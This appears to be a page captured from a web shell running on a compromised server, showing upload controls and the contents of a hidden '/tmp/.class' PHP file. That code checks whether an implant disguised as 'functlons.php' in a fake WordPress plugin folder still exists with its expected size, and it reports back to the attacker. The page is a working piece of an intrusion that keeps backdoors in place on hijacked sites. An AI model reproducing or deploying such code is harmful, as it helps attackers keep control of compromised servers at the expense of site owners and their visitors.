Your IP : 216.73.216.5


Current Path : /tmp/
Upload File :
Current File : //tmp/.class

<?php   $r = ''; $x = ["/home/theafprt/fnf.group/wp-content/plugins/custom-1746544233/functlons.php"=>"bd@@3115318@@1078"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');